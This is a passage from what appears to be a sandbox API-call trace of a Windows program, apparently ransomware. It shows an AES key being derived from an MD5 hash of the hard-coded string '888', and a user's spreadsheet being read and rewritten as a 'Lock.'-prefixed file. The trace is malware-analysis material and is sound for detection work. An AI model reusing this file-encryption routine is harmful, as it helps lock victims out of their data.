wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabbc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.070] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72698, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.070] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.070] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.070] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.070] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.070] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.070] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabbc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.070] CryptHashData (hHash=0x9e2078, pbData=0x2a72698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb78, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.071] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.072] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.072] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.072] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.072] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.072] CryptDestroyHash (hHash=0x9e2078) returned 1 [0223.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/_wc0ld1_h 9LSGLE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\_wc0ld1_h 9lsgle.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0223.073] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.073] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0223.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0223.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0223.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b78 [0223.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0223.075] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0223.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b78 | out: hHeap=0x2af0000) returned 1 [0223.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0223.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0223.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0223.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0223.076] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock._wc0ld1_h 9LSGLE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock._wc0ld1_h 9lsgle.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0223.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70e0 [0223.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0223.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0223.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0223.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0223.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0223.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0223.078] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0223.078] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e9020 [0223.081] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0223.081] ReadFile (in: hFile=0x4b0, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x5c0d, lpOverlapped=0x0) returned 1 [0223.094] ReadFile (in: hFile=0x4b0, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0223.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0223.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0223.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c0d) returned 0x2a8a138 [0223.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x54e9020 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0223.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0223.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0223.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c0d) returned 0x2a8fd50 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: 